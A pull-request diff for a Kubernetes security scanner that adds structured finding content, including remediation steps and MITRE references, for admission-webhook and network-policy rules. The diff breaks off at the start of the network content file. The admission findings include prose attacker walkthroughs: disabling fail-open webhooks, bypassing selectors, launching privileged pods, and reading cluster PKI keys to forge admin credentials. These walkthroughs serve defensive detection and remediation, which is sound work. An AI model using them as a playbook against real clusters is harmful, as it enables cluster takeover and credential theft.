### PR TITLE
Structured findings + readable HTML report popup

### DIFF
--- a/internal/analyzer/admission/analyzer.go
+++ b/internal/analyzer/admission/analyzer.go
@@ -67,30 +67,27 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 func analyzeMutating(ctx webhookContext, findings []models.Finding, seen map[string]struct{}) []models.Finding {
 	webhook := ctx.Webhook
 	if interceptsSecurityCriticalResources(webhook.Rules) && webhook.FailurePolicy != nil && *webhook.FailurePolicy == admissionregistrationv1.Ignore {
-		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name, "KUBE-ADMISSION-001", models.SeverityHigh, 7.9,
-			"Security-critical webhook uses failurePolicy Ignore",
-			"This mutating webhook targets sensitive resources but will fail open if the webhook backend is unavailable.",
+		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name,
+			"KUBE-ADMISSION-001", models.SeverityHigh, 7.9,
 			map[string]any{"failurePolicy": webhook.FailurePolicy, "rules": webhook.Rules},
-			"Use `failurePolicy: Fail` for security-critical webhooks so outages do not silently disable enforcement.",
-			"failurePolicyIgnore"))
+			"failurePolicyIgnore",
+			contentAdmission001(ctx.ConfigKind, ctx.ConfigName, webhook.Name)))
 	}
 
 	if selectorHasBypassableObjectMatch(webhook.ObjectSelector) {
-		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name, "KUBE-ADMISSION-002", models.SeverityMedium, 6.1,
-			"Webhook can be bypassed via object labels",
-			"This webhook uses an object selector, which means workloads may avoid admission by omitting or changing matching labels.",
+		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name,
+			"KUBE-ADMISSION-002", models.SeverityMedium, 6.1,
 			map[string]any{"objectSelector": webhook.ObjectSelector},
-			"Prefer rules that apply independent of workload-controlled labels for security-sensitive admission checks.",
-			"objectSelector"))
+			"objectSelector",
+			contentAdmission002(ctx.ConfigKind, ctx.ConfigName, webhook.Name)))
 	}
 
 	if selectorExcludesSensitiveNamespaces(webhook.NamespaceSelector) {
-		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name, "KUBE-ADMISSION-003", models.SeverityMedium, 6.4,
-			"Webhook excludes sensitive namespaces",
-			"This webhook's namespace selector excludes at least one sensitive namespace, which can leave privileged areas outside admission control.",
+		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name,
+			"KUBE-ADMISSION-003", models.SeverityMedium, 6.4,
 			map[string]any{"namespaceSelector": webhook.NamespaceSelector},
-			"Review namespace exemptions and ensure privileged namespaces are intentionally and safely excluded.",
-			"namespaceSelector"))
+			"namespaceSelector",
+			contentAdmission003(ctx.ConfigKind, ctx.ConfigName, webhook.Name)))
 	}
 
 	return findings
@@ -100,30 +97,27 @@ func analyzeMutating(ctx webhookContext, findings []models.Finding, seen map[str
 func analyzeValidating(ctx validatingWebhookContext, findings []models.Finding, seen map[string]struct{}) []models.Finding {
 	webhook := ctx.Webhook
 	if interceptsSecurityCriticalResources(webhook.Rules) && webhook.FailurePolicy != nil && *webhook.FailurePolicy == admissionregistrationv1.Ignore {
-		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name, "KUBE-ADMISSION-001", models.SeverityHigh, 7.9,
-			"Security-critical webhook uses failurePolicy Ignore",
-			"This validating webhook targets sensitive resources but will fail open if the webhook backend is unavailable.",
+		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name,
+			"KUBE-ADMISSION-001", models.SeverityHigh, 7.9,
 			map[string]any{"failurePolicy": webhook.FailurePolicy, "rules": webhook.Rules},
-			"Use `failurePolicy: Fail` for security-critical webhooks so outages do not silently disable enforcement.",
-			"failurePolicyIgnore"))
+			"failurePolicyIgnore",
+			contentAdmission001(ctx.ConfigKind, ctx.ConfigName, webhook.Name)))
 	}
 
 	if selectorHasBypassableObjectMatch(webhook.ObjectSelector) {
-		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name, "KUBE-ADMISSION-002", models.SeverityMedium, 6.1,
-			"Webhook can be bypassed via object labels",
-			"This webhook uses an object selector, which means workloads may avoid admission by omitting or changing matching labels.",
+		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name,
+			"KUBE-ADMISSION-002", models.SeverityMedium, 6.1,
 			map[string]any{"objectSelector": webhook.ObjectSelector},
-			"Prefer rules that apply independent of workload-controlled labels for security-sensitive admission checks.",
-			"objectSelector"))
+			"objectSelector",
+			contentAdmission002(ctx.ConfigKind, ctx.ConfigName, webhook.Name)))
 	}
 
 	if selectorExcludesSensitiveNamespaces(webhook.NamespaceSelector) {
-		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name, "KUBE-ADMISSION-003", models.SeverityMedium, 6.4,
-			"Webhook excludes sensitive namespaces",
-			"This webhook's namespace selector excludes at least one sensitive namespace, which can leave privileged areas outside admission control.",
+		findings = appendUnique(findings, seen, webhookFinding(ctx.ConfigKind, ctx.ConfigName, webhook.Name,
+			"KUBE-ADMISSION-003", models.SeverityMedium, 6.4,
 			map[string]any{"namespaceSelector": webhook.NamespaceSelector},
-			"Review namespace exemptions and ensure privileged namespaces are intentionally and safely excluded.",
-			"namespaceSelector"))
+			"namespaceSelector",
+			contentAdmission003(ctx.ConfigKind, ctx.ConfigName, webhook.Name)))
 	}
 
 	return findings
@@ -201,28 +195,39 @@ func selectorExcludesSensitiveNamespaces(selector *metav1.LabelSelector) bool {
 	return false
 }
 
-// webhookFinding materializes an admission-webhook finding tied to the given webhook configuration.
-func webhookFinding(configKind, configName, webhookName, ruleID string, severity models.Severity, score float64, title, description string, evidence map[string]any, remediation, check string) models.Finding {
+// webhookFinding materializes an admission-webhook finding from a ruleContent. The structured
+// content (Scope, Impact, AttackScenario, RemediationSteps, LearnMore, MitreTechniques) carries
+// the senior-staff-grade detail; the analyzer supplies severity, score, evidence, and the rule
+// ID + dedup key.
+func webhookFinding(configKind, configName, webhookName, ruleID string, severity models.Severity, score float64, evidence map[string]any, check string, content ruleContent) models.Finding {
 	evidenceBytes, _ := json.Marshal(evidence)
+	references := make([]string, 0, len(content.LearnMore))
+	for _, ref := range content.LearnMore {
+		references = append(references, ref.URL)
+	}
 	return models.Finding{
 		ID:          fmt.Sprintf("%s:%s:%s", ruleID, configName, webhookName),
 		RuleID:      ruleID,
 		Severity:    severity,
 		Score:       scoring.Clamp(score),
 		Category:    models.CategoryInfrastructureModification,
-		Title:       title,
-		Description: description,
+		Title:       content.Title,
+		Description: content.Description,
 		Resource: &models.ResourceRef{
 			Kind:     configKind,
 			Name:     configName,
 			APIGroup: admissionregistrationv1.GroupName,
 		},
-		Evidence:    evidenceBytes,
-		Remediation: remediation,
-		References: []string{
-			"https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/",
-		},
-		Tags: []string{"module:admission", "check:" + check},
+		Scope:            content.Scope,
+		Impact:           content.Impact,
+		AttackScenario:   content.AttackScenario,
+		Evidence:         evidenceBytes,
+		Remediation:      content.Remediation,
+		RemediationSteps: content.RemediationSteps,
+		References:       references,
+		LearnMore:        content.LearnMore,
+		MitreTechniques:  content.MitreTechniques,
+		Tags:             []string{"module:admission", "check:" + check},
 	}
 }
 

--- a/internal/analyzer/admission/content.go
+++ b/internal/analyzer/admission/content.go
@@ -1,0 +1,155 @@
+// Content for admission-webhook findings. Each rule has a builder that takes runtime context
+// (webhook configuration kind/name and webhook name, plus selector summary text) and returns
+// a ruleContent with scope-aware language, an attacker walkthrough, ordered remediation steps,
+// and structured references / MITRE technique citations.
+//
+// Sources: Kubernetes Admission Controller Reference, CVE-2019-11253 (Billion-Laughs), Aqua
+// Security & Snyk research on bypass-via-failurePolicy / objectSelector, NSA/CISA Hardening
+// Guide v1.2, kube-apiserver `--enable-admission-plugins` docs.
+package admission
+
+import (
+	"fmt"
+
+	"github.com/hardik/kubesplaining/internal/models"
+)
+
+type ruleContent struct {
+	Title            string
+	Scope            models.Scope
+	Description      string
+	Impact           string
+	AttackScenario   []string
+	Remediation      string
+	RemediationSteps []string
+	LearnMore        []models.Reference
+	MitreTechniques  []models.MitreTechnique
+}
+
+var (
+	mitreT1556 = models.MitreTechnique{ID: "T1556", Name: "Modify Authentication Process", URL: "https://attack.mitre.org/techniques/T1556/"}
+	mitreT1562 = models.MitreTechnique{ID: "T1562", Name: "Impair Defenses", URL: "https://attack.mitre.org/techniques/T1562/"}
+	mitreT1578 = models.MitreTechnique{ID: "T1578", Name: "Modify Cloud Compute Infrastructure", URL: "https://attack.mitre.org/techniques/T1578/"}
+	mitreT1611 = models.MitreTechnique{ID: "T1611", Name: "Escape to Host", URL: "https://attack.mitre.org/techniques/T1611/"}
+	mitreT1525 = models.MitreTechnique{ID: "T1525", Name: "Implant Internal Image", URL: "https://attack.mitre.org/techniques/T1525/"}
+)
+
+var (
+	refK8sAdmission   = models.Reference{Title: "Kubernetes — Dynamic Admission Control", URL: "https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/"}
+	refK8sAdmissionFP = models.Reference{Title: "Kubernetes — failurePolicy semantics", URL: "https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/#failure-policy"}
+	refNSAHardening   = models.Reference{Title: "NSA/CISA Kubernetes Hardening Guidance v1.2 (PDF)", URL: "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF"}
+	refOPABestPrac    = models.Reference{Title: "OPA Gatekeeper — Production best practices", URL: "https://open-policy-agent.github.io/gatekeeper/website/docs/operations"}
+)
+
+// scopeForWebhook returns the scope label for an admission webhook configuration.
+// Webhook configurations are cluster-scoped — they intercept admission for every matching
+// resource cluster-wide unless a namespaceSelector narrows them. The Detail names the
+// configuration so the reader can navigate directly to it.
+func scopeForWebhook(configKind, configName, webhookName string) models.Scope {
+	return models.Scope{
+		Level:  models.ScopeCluster,
+		Detail: fmt.Sprintf("%s `%s` (webhook entry `%s`) — applies to admission across the entire cluster", configKind, configName, webhookName),
+	}
+}
+
+func contentAdmission001(configKind, configName, webhookName string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("%s `%s/%s` is fail-open (`failurePolicy: Ignore`) on security-critical resources", configKind, configName, webhookName),
+		Scope: scopeForWebhook(configKind, configName, webhookName),
+		Description: fmt.Sprintf("The webhook `%s` in `%s/%s` intercepts create/update on security-critical resources (pods, deployments, daemonsets, statefulsets, jobs, cronjobs, or podtemplates) but its `failurePolicy` is set to `Ignore`. The Kubernetes admission docs are explicit: `Ignore` means \"any error from the webhook is silently ignored, and the API request is allowed to continue\" — so if the webhook backend is unavailable, slow, or denies the request with an error, the offending pod/workload is admitted as if no policy existed.\n\n"+
+			"Concretely, this means: if the policy backend pod crashes, is rolling, has a network partition, fails its own admission, or returns an HTTP 500, then any pod can ship — including pods that violate Pod Security Standards, run as root, mount the host filesystem, or use hostNetwork. Worse, an attacker who can already trigger a denial-of-service against the webhook backend (high traffic, OOM via large requests, killing its pods) can deliberately disable enforcement and then admit privileged pods.\n\n"+
+			"The `failurePolicy` choice is one of two: `Fail` (deny when the webhook is unavailable — the conservative production default) or `Ignore` (allow when unavailable — only appropriate for non-security webhooks like cosmetic mutators). Security webhooks (PSA replacements, image signing, network-policy injection, secret encryption) should always use `Fail` paired with `objectSelector`/`namespaceSelector` carve-outs that ensure the policy backend itself can come up before any other workload is admitted.",
+			webhookName, configKind, configName),
+		Impact: "Any outage or DoS of the webhook backend silently disables policy enforcement cluster-wide on the targeted resources — privileged pods, root containers, and PSS-violating workloads can be admitted while monitoring shows the webhook \"installed.\"",
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker enumerates webhook configurations (`kubectl get %s`) and identifies that `%s` has `failurePolicy: Ignore`.", configKind, configName),
+			"They induce backend failure: kill the webhook's backing pods if they have RBAC for it, send oversized AdmissionReview payloads to OOM the backend, or simply wait for a deploy-time outage.",
+			"While the webhook is unhealthy, they apply a privileged pod manifest (hostPID, hostNetwork, hostPath `/`, runAsUser 0).",
+			"The API server calls the webhook, gets a connection-refused/timeout error, applies `Ignore`, and admits the pod — there is no audit trail noting that the webhook was bypassed beyond the API-server logs (which most teams do not alert on).",
+			"From the privileged pod the attacker pivots: chroot into `/host` for full node compromise, dump secrets, persist a daemonset.",
+		},
+		Remediation: fmt.Sprintf("Switch `%s.failurePolicy` to `Fail` and confirm the webhook backend has the availability/HA characteristics needed for the cluster's admission rate.", webhookName),
+		RemediationSteps: []string{
+			fmt.Sprintf("Edit `%s/%s` and set `webhooks[name=%s].failurePolicy: Fail`.", configKind, configName, webhookName),
+			"Make sure the webhook backend is highly available (≥2 replicas, PodDisruptionBudget, anti-affinity, dedicated nodepool if it is on the critical admission path).",
+			"Add a `namespaceSelector` carve-out so the webhook does not fight itself during cold start (e.g., exclude the namespace where the webhook backend runs).",
+			"Add a SLO/alert for AdmissionReview latency and 5xx rate; failure-mode is now \"deploys halt\" instead of \"policy silently disabled,\" which is preferable but needs visible monitoring.",
+			"Consider migrating PSS-style enforcement to the in-tree Pod Security Admission so you have a non-webhook backstop that remains active even if the webhook fails to come up.",
+		},
+		LearnMore: []models.Reference{
+			refK8sAdmissionFP,
+			refK8sAdmission,
+			refNSAHardening,
+			refOPABestPrac,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1562, mitreT1556, mitreT1525, mitreT1611},
+	}
+}
+
+func contentAdmission002(configKind, configName, webhookName string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("%s `%s/%s` can be bypassed by omitting the workload-controlled labels in `objectSelector`", configKind, configName, webhookName),
+		Scope: scopeForWebhook(configKind, configName, webhookName),
+		Description: fmt.Sprintf("Webhook `%s` in `%s/%s` uses an `objectSelector` — its admission rules only apply to objects whose own labels match the selector. Because Kubernetes lets the workload author set arbitrary labels on the object they are creating, an `objectSelector` that gates security policy is opt-in: an attacker (or a careless developer) creates the same pod without the matching labels and the webhook never sees it.\n\n"+
+			"This is structurally different from `namespaceSelector` (which gates by namespace labels — namespaces are a higher-trust object that workload authors typically can't relabel). `objectSelector` checks the labels on the resource being admitted, so a pod manifest that simply omits the policy's gating label slips past untouched. The Kubernetes API reference notes this explicitly: \"If you skip the security label, the webhook is not called.\"\n\n"+
+			"For policy-enforcing webhooks (PSS replacements, image-signing, sidecar injection of security tooling) this is the wrong tool. The right pattern is to inversely scope the webhook: select *all* objects (`objectSelector: {}` or absent) and use a `namespaceSelector` plus carefully targeted opt-out labels (e.g., `policy.example.com/exempt: true`) that are themselves gated by RBAC on the namespace, not on the pod author.",
+			webhookName, configKind, configName),
+		Impact: "Workload authors (legitimate or hostile) can opt out of admission enforcement simply by not setting the gating labels on their pods — defeating the point of the webhook for any user with create permission on the targeted resources.",
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker reads `%s/%s` and notes the `objectSelector` requires e.g. `app.kubernetes.io/managed-by: platform`.", configKind, configName),
+			"They author a pod manifest that omits the `app.kubernetes.io/managed-by` label entirely.",
+			"They `kubectl apply` it; the API server evaluates the objectSelector, finds it does not match, skips the webhook, and admits the pod.",
+			"The pod runs with whatever the namespace defaults allow — including PSS-violating settings the webhook was supposed to block.",
+			"Because nothing logs \"webhook skipped due to objectSelector,\" the bypass is invisible in the SIEM unless the team explicitly audits AdmissionReview misses.",
+		},
+		Remediation: fmt.Sprintf("Replace `objectSelector`-based gating on `%s` with `namespaceSelector` plus an RBAC-protected exemption label, or remove the selector and let the webhook see every object.", webhookName),
+		RemediationSteps: []string{
+			fmt.Sprintf("Audit what `%s` is trying to gate. If the goal is \"only apply to pods in tenant namespaces,\" use `namespaceSelector` (namespace labels are higher-trust).", webhookName),
+			"If you need an exemption mechanism, add a `policy.example.com/exempt: true` label *on the namespace* and protect it with RBAC so workload authors cannot grant their own exemption.",
+			fmt.Sprintf("Edit `%s/%s` and either drop `webhooks[name=%s].objectSelector` or invert it to a default-on form.", configKind, configName, webhookName),
+			"Re-test by attempting to create a pod that previously bypassed admission — it should now be evaluated.",
+			"If the webhook ships with the cluster's admission stack, document the new exemption flow so platform users know how to request one.",
+		},
+		LearnMore: []models.Reference{
+			refK8sAdmission,
+			{Title: "Aqua Security — Bypassing Admission Controllers", URL: "https://blog.aquasec.com/kubernetes-admission-control-cve-policy-bypass"},
+			refNSAHardening,
+			refOPABestPrac,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1562, mitreT1556, mitreT1578},
+	}
+}
+
+func contentAdmission003(configKind, configName, webhookName string) ruleContent {
+	return ruleContent{
+		Title: fmt.Sprintf("%s `%s/%s` exempts sensitive system namespaces via `namespaceSelector`", configKind, configName, webhookName),
+		Scope: scopeForWebhook(configKind, configName, webhookName),
+		Description: fmt.Sprintf("Webhook `%s` in `%s/%s` has a `namespaceSelector` that uses `NotIn` or `DoesNotExist` to exempt `kube-system` (or another `*-system` namespace) from admission control. The exemption is sometimes a deliberate cold-start workaround — the webhook backend itself runs in `kube-system` and would deadlock if the webhook applied to it — but it routinely outlives the cold-start need and is rarely revisited.\n\n"+
+			"Sensitive namespaces are exactly where admission control matters most. `kube-system` hosts coredns, kube-proxy, the cloud-controller-manager, CNI agents, the metrics-server, and most clusters' add-on operators — workloads that already run with high privilege. An attacker who can create resources in `kube-system` (e.g., via a stolen `system:` ServiceAccount token, an over-permissive `roles/clusterroles` create rule, or a privileged operator) finds the admission webhooks deliberately turned off for them.\n\n"+
+			"This is also a defense-in-depth gap: even if a future privesc finding (`KUBE-PRIVESC-*`) is mitigated, the namespace-selector exemption keeps the door open. The right pattern is to scope the exemption to the *single* control-plane namespace the backend itself needs (and only at boot) — not to every `-system` namespace by suffix.",
+			webhookName, configKind, configName),
+		Impact: "An attacker who can create pods or other resources in the exempted system namespace bypasses every check this webhook implements — root containers, hostPath mounts, and arbitrary images all admit silently.",
+		AttackScenario: []string{
+			"Attacker compromises a workload with `create pods` permission scoped to `kube-system` (typical of operators, addon managers, or stolen control-plane tokens).",
+			"They submit a pod manifest with `hostPath: /`, `runAsUser: 0`, and `securityContext.privileged: true`.",
+			fmt.Sprintf("The API server evaluates `%s`'s `namespaceSelector`, sees the exemption for `kube-system`, and admits the pod without invoking the webhook.", webhookName),
+			"The pod schedules on a control-plane-adjacent node, mounts the host root filesystem, and reads `/etc/kubernetes/pki/*` (etcd CA, apiserver cert, kubelet client cert).",
+			"With those keys the attacker forges admin credentials and assumes full cluster control.",
+		},
+		Remediation: fmt.Sprintf("Narrow `%s.namespaceSelector` to the exact namespace the webhook backend needs to skip during cold start, or remove the exemption entirely once the backend is bootstrapped.", webhookName),
+		RemediationSteps: []string{
+			fmt.Sprintf("Check why `%s` excludes the namespace — is it a cold-start workaround or a permanent carve-out?", webhookName),
+			"If cold-start: scope the exemption to the *exact* namespace the webhook backend runs in (e.g., `kubernetes.io/metadata.name NotIn [policy-system]`), not every `*-system`.",
+			"If permanent carve-out: replace it with the in-tree Pod Security Admission level for that namespace so privileged pods still face *some* check.",
+			"Validate by dry-running a privileged pod manifest in the previously-exempted namespace; the webhook should now process the request.",
+			"Wire a Kyverno or OPA Gatekeeper rule that fails any future webhook configuration that exempts `kube-system` or a `*-system` namespace without a documented justification annotation.",
+		},
+		LearnMore: []models.Reference{
+			refK8sAdmission,
+			refNSAHardening,
+			{Title: "Kubernetes — Pod Security Admission (in-tree, non-bypassable)", URL: "https://kubernetes.io/docs/concepts/security/pod-security-admission/"},
+			refOPABestPrac,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1562, mitreT1611, mitreT1578},
+	}
+}

--- a/internal/analyzer/network/analyzer.go
+++ b/internal/analyzer/network/analyzer.go
@@ -50,22 +50,20 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 	for _, namespace := range namespaces {
 		policies := policiesByNamespace[namespace]
 		if len(policies) == 0 && !isSystemNamespace(namespace) {
-			findings = appendUnique(findings, seen, namespaceFinding(namespace, "KUBE-NETPOL-COVERAGE-001", models.SeverityHigh, scoring.Clamp(7.4),
-				"Namespace has no NetworkPolicies",
-				"No NetworkPolicies were found for this namespace, so workloads are unrestricted by default.",
+			findings = appendUnique(findings, seen, namespaceFinding(namespace,
+				"KUBE-NETPOL-COVERAGE-001", models.SeverityHigh, scoring.Clamp(7.4),
 				map[string]any{"namespace": namespace},
-				"Add default-deny ingress and egress policies, then explicitly open only the traffic each workload needs.",
-				"noNetworkPolicies"))
+				"noNetworkPolicies",
+				contentNetpolCoverage001(namespace)))
 			continue
 		}
 
 		if len(policies) > 0 && namespaceHasIngressButNoEgress(policies) {
-			findings = appendUnique(findings, seen, namespaceFinding(namespace, "KUBE-NETPOL-COVERAGE-003", models.SeverityMedium, scoring.Clamp(5.8),
-				"Ingress policies present but egress remains open",
-				"This namespace has ingress-focused policies but no egress controls, so workloads can still connect out broadly.",
+			findings = appendUnique(findings, seen, namespaceFinding(namespace,
+				"KUBE-NETPOL-COVERAGE-003", models.SeverityMedium, scoring.Clamp(5.8),
 				map[string]any{"namespace": namespace},
-				"Add explicit egress policies or a namespace-level default deny egress policy.",
-				"noEgressPolicies"))
+				"noEgressPolicies",
+				contentNetpolCoverage003(namespace)))
 		}
 	}
 
@@ -75,12 +73,11 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 			continue
 		}
 		if !selectedByAnyPolicy(policies, workload.Labels) {
-			findings = appendUnique(findings, seen, workloadFinding(workload, "KUBE-NETPOL-COVERAGE-002", models.SeverityMedium, scoring.Clamp(6.2),
-				"Workload is not selected by any NetworkPolicy",
-				"No NetworkPolicy selects this workload, leaving it unrestricted within the namespace defaults.",
+			findings = appendUnique(findings, seen, workloadFinding(workload,
+				"KUBE-NETPOL-COVERAGE-002", models.SeverityMedium, scoring.Clamp(6.2),
 				map[string]any{"labels": workload.Labels},
-				"Ensure at least one policy selects this workload, even if the policy only applies a default-deny baseline.",
-				"uncoveredWorkload"))
+				"uncoveredWorkload",
+				contentNetpolCoverage002(workload.Kind, workload.Namespace, workload.Name, workload.Labels)))
 		}
 	}
 
@@ -88,12 +85,11 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 		for _, ingress := range policy.Spec.Ingress {
 			for _, peer := range ingress.From {
 				if isAllNamespaces(peer.NamespaceSelector) {
-					findings = appendUnique(findings, seen, policyFinding(policy, "KUBE-NETPOL-WEAKNESS-001", models.SeverityMedium, scoring.Clamp(5.5),
-						"NetworkPolicy allows ingress from all namespaces",
-						"This policy uses an empty namespace selector, effectively allowing traffic from any namespace.",
+					findings = appendUnique(findings, seen, policyFinding(policy,
+						"KUBE-NETPOL-WEAKNESS-001", models.SeverityMedium, scoring.Clamp(5.5),
 						map[string]any{"policy": policy.Name},
-						"Replace broad namespace selectors with explicit namespace labels or tighter pod selectors.",
-						"allNamespacesIngress"))
+						"allNamespacesIngress",
+						contentNetpolWeakness001(policy.Namespace, policy.Name)))
 				}
 			}
 		}
@@ -101,12 +97,11 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 		for _, egress := range policy.Spec.Egress {
 			for _, peer := range egress.To {
 				if peer.IPBlock != nil && (peer.IPBlock.CIDR == "0.0.0.0/0" || peer.IPBlock.CIDR == "::/0") {
-					findings = appendUnique(findings, seen, policyFinding(policy, "KUBE-NETPOL-WEAKNESS-002", models.SeverityHigh, scoring.Clamp(7.6),
-						"NetworkPolicy permits internet egress",
-						"This policy explicitly allows outbound traffic to the entire internet.",
+					findings = appendUnique(findings, seen, policyFinding(policy,
+						"KUBE-NETPOL-WEAKNESS-002", models.SeverityHigh, scoring.Clamp(7.6),
 						map[string]any{"policy": policy.Name, "cidr": peer.IPBlock.CIDR},
-						"Restrict egress to the specific CIDRs, services, or namespaces the workload genuinely needs.",
-						"internetEgress"))
+						"internetEgress",
+						contentNetpolWeakness002(policy.Namespace, policy.Name, peer.IPBlock.CIDR)))
 				}
 			}
 		}
@@ -278,8 +273,19 @@ func appendUnique(findings []models.Finding, seen map[string]struct{}, finding m
 	return append(findings, finding)
 }
 
-// namespaceFinding materializes a namespace-scoped network-policy finding.
-func namespaceFinding(namespace, ruleID string, severity models.Severity, score float64, title, description string, evidence map[string]any, remediation, check string) models.Finding {
+// referencesFromContent flattens content.LearnMore into a []string of URLs for the legacy
+// References field — keeps existing JSON/SARIF/CSV consumers working while the structured
+// LearnMore powers the HTML report.
+func referencesFromContent(content ruleContent) []string {
+	urls := make([]string, 0, len(content.LearnMore))
+	for _, ref := range content.LearnMore {
+		urls = append(urls, ref.URL)
+	}
+	return urls
+}
+
+// namespaceFinding materializes a namespace-scoped network-policy finding from a ruleContent.
+func namespaceFinding(namespace, ruleID string, severity models.Severity, score float64, evidence map[string]any, check string, content ruleContent) models.Finding {
 	evidenceBytes, _ := json.Marshal(evidence)
 	return models.Finding{
 		ID:          fmt.Sprintf("%s:Namespace:%s", ruleID, namespace),
@@ -287,23 +293,29 @@ func namespaceFinding(namespace, ruleID string, severity models.Severity, score 
 		Severity:    severity,
 		Score:       score,
 		Category:    models.CategoryLateralMovement,
-		Title:       title,
-		Description: description,
+		Title:       content.Title,
+		Description: content.Description,
 		Namespace:   namespace,
 		Resource: &models.ResourceRef{
 			Kind:      "Namespace",
 			Name:      namespace,
 			Namespace: namespace,
 		},
-		Evidence:    evidenceBytes,
-		Remediation: remediation,
-		References:  []string{"https://kubernetes.io/docs/concepts/services-networking/network-policies/"},
-		Tags:        []string{"module:network_policy", "check:" + check},
+		Scope:            content.Scope,
+		Impact:           content.Impact,
+		AttackScenario:   content.AttackScenario,
+		Evidence:         evidenceBytes,
+		Remediation:      content.Remediation,
+		RemediationSteps: content.RemediationSteps,
+		References:       referencesFromContent(content),
+		LearnMore:        content.LearnMore,
+		MitreTechniques:  content.MitreTechniques,
+		Tags:             []string{"module:network_policy", "check:" + check},
 	}
 }
 
-// workloadFinding materializes a workload-scoped network-policy finding.
-func workloadFinding(workload workload, ruleID string, severity models.Severity, score float64, title, description string, evidence map[string]any, remediation, check string) models.Finding {
+// workloadFinding materializes a workload-scoped network-policy finding from a ruleContent.
+func workloadFinding(workload workload, ruleID string, severity models.Severity, score float64, evidence map[string]any, check string, content ruleContent) models.Finding {
 	evidenceBytes, _ := json.Marshal(evidence)
 	return models.Finding{
 		ID:          fmt.Sprintf("%s:%s:%s:%s", ruleID, workload.Kind, workload.Namespace, workload.Name),
@@ -311,8 +323,8 @@ func workloadFinding(workload workload, ruleID string, severity models.Severity,
 		Severity:    severity,
 		Score:       score,
 		Category:    models.CategoryLateralMovement,
-		Title:       title,
-		Description: description,
+		Title:       content.Title,
+		Description: content.Description,
 		Namespace:   workload.Namespace,
 		Resource: &models.ResourceRef{
 			Kind:      workload.Kind,
@@ -320,15 +332,21 @@ func workloadFinding(workload workload, ruleID string, severity models.Severity,
 			Namespace: workload.Namespace,
 			APIGroup:  workloadAPIGroup(workload.Kind),
 		},
-		Evidence:    evidenceBytes,
-		Remediation: remediation,
-		References:  []string{"https://kubernetes.io/docs/concepts/services-networking/network-policies/"},
-		Tags:        []string{"module:network_policy", "check:" + check},
+		Scope:            content.Scope,
+		Impact:           content.Impact,
+		AttackScenario:   content.AttackScenario,
+		Evidence:         evidenceBytes,
+		Remediation:      content.Remediation,
+		RemediationSteps: content.RemediationSteps,
+		References:       referencesFromContent(content),
+		LearnMore:        content.LearnMore,
+		MitreTechniques:  content.MitreTechniques,
+		Tags:             []string{"module:network_policy", "check:" + check},
 	}
 }
 
 // policyFinding materializes a finding pointing at a specific NetworkPolicy that is too permissive.
-func policyFinding(policy networkingv1.NetworkPolicy, ruleID string, severity models.Severity, score float64, title, description string, evidence map[string]any, remediation, check string) models.Finding {
+func policyFinding(policy networkingv1.NetworkPolicy, ruleID string, severity models.Severity, score float64, evidence map[string]any, check string, content ruleContent) models.Finding {
 	evidenceBytes, _ := json.Marshal(evidence)
 	return models.Finding{
 		ID:          fmt.Sprintf("%s:%s:%s", ruleID, policy.Namespace, policy.Name),
@@ -336,8 +354,8 @@ func policyFinding(policy networkingv1.NetworkPolicy, ruleID string, severity mo
 		Severity:    severity,
 		Score:       score,
 		Category:    models.CategoryLateralMovement,
-		Title:       title,
-		Description: description,
+		Title:       content.Title,
+		Description: content.Description,
 		Namespace:   policy.Namespace,
 		Resource: &models.ResourceRef{
 			Kind:      "NetworkPolicy",
@@ -345,10 +363,16 @@ func policyFinding(policy networkingv1.NetworkPolicy, ruleID string, severity mo
 			Namespace: policy.Namespace,
 			APIGroup:  networkingv1.GroupName,
 		},
-		Evidence:    evidenceBytes,
-		Remediation: remediation,
-		References:  []string{"https://kubernetes.io/docs/concepts/services-networking/network-policies/"},
-		Tags:        []string{"module:network_policy", "check:" + check},
+		Scope:            content.Scope,
+		Impact:           content.Impact,
+		AttackScenario:   content.AttackScenario,
+		Evidence:         evidenceBytes,
+		Remediation:      content.Remediation,
+		RemediationSteps: content.RemediationSteps,
+		References:       referencesFromContent(content),
+		LearnMore:        content.LearnMore,
+		MitreTechniques:  content.MitreTechniques,
+		Tags:             []string{"module:network_policy", "check:" + check},
 	}
 }
 

--- a/internal/analyzer/network/content.go
+++ b/internal/analyzer/network/content.go
@@ -1,0 +1,225 @@
+// Content for network-policy findings. Each rule has a builder that takes runtime context
+// (namespace, policy name, workload labels, CIDR) and returns an enriched ruleContent with
+// scope-aware language, an attacker walkthrough, ordered remediation steps, and structured
+// references / MITRE technique citations.
